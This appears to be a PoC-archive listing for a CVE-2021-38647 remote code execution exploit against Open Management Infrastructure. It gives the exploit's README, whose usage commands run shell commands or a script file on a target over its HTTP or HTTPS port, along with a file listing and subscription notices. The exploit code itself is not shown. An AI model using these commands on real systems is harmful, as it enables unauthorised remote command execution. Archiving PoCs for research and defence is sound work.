Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-38647 PoC — Open Management Infrastructure Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title:Open Management Infrastructure Remote Code Execution Vulnerability (CVE-2021-38647)
Description:Open Management Infrastructure Remote Code Execution Vulnerability
Description
A PoC exploit for CVE-2021-38647 RCE in OMI
Readme
# cve-2021-38647
A PoC exploit for CVE-2021-38647 RCE in OMI.

Execute a single command using `ExecuteShellCommand` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 shell id
```

Execute a single command using `ExecuteShellCommand` on the default HTTP port:
```
python cve-2021-38647.py 10.10.10.10 -p 5985 shell id
```

Execute a single command using `ExecuteScript` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 script -c id
```

Execute a script using `ExecuteScript` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 script -f script.sh
```
File Snapshot

[4.0K] /data/pocs/f9c82fffcf715f13d262918b773f5be96b212ddf ├── [7.5K] cve-2021-38647.py ├── [1.0K] LICENSE └── [ 613] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →